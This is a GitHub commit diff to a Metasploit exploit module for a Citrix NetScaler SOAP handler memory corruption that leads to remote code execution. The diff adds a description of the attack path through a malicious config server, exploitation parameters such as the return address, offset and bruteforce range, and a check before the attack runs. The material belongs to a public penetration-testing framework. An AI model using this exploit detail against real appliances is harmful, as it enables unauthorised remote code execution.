Skip to content

Commit 9404e24

Browse files
committed
Update module information
1 parent ac93932 commit 9404e24

File tree

1 file changed

+17
-5
lines changed

1 file changed

+17
-5
lines changed

modules/exploits/freebsd/misc/citrix_netscaler_bof.rb

Lines changed: 17 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -14,10 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote
1414

1515
def initialize(info={})
1616
super(update_info(info,
17-
'Name' => "Citrix NetScaler Buffer Overflow",
17+
'Name' => "Citrix NetScaler SOAP Handler Remote Code Execution",
1818
'Description' => %q{
19-
This module exploits a buffer overflow vulnerability found in Citrix NetScaler...
20-
The vulnerability exists.... This module has been tested successfully on....
19+
This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
20+
The vulnerability exists in the SOAP handler, accessible through the web interface. A
21+
malicious SOAP requests can force the handler to connect to a malicious NetScaler config
22+
server. This malicious config server can send a specially crafted response in order to
23+
trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
24+
code with the privileges of the web server running the SOAP handler. This module has been
25+
tested successfully on the NetScaler Virtual Appliance 450010.
2126
},
2227
'License' => MSF_LICENSE,
2328
'Author' =>
@@ -27,7 +32,7 @@ def initialize(info={})
2732
],
2833
'References' =>
2934
[
30-
['URL', 'http://http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
35+
['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
3136
],
3237
'Payload' =>
3338
{
@@ -40,11 +45,14 @@ def initialize(info={})
4045
'Stance' => Msf::Exploit::Stance::Aggressive,
4146
'Targets' =>
4247
[
43-
[ 'NetScaler Virtual Appliance',
48+
[ 'NetScaler Virtual Appliance 450010',
4449
{
4550
'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
4651
'Offset' => 606,
4752
'Ret' => 0xffffda94, # Try before bruteforce...
53+
# The virtual appliance lacks of security mitigations like DEP/ASLR, since the
54+
# process being exploited is an apache child, the bruteforce attack works fine
55+
# here.
4856
'Bruteforce' =>
4957
{
5058
'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
@@ -84,6 +92,10 @@ def exploit
8492
fail_with(Failure::BadConfig, 'Don\'t use 0.0.0.0 as SRVHOST, use an address on the local machine reachable by the target')
8593
end
8694

95+
if check != Exploit::CheckCode::Detected
96+
fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
97+
end
98+
8799
start_service
88100

89101
if target.ret

0 commit comments

Comments
 (0)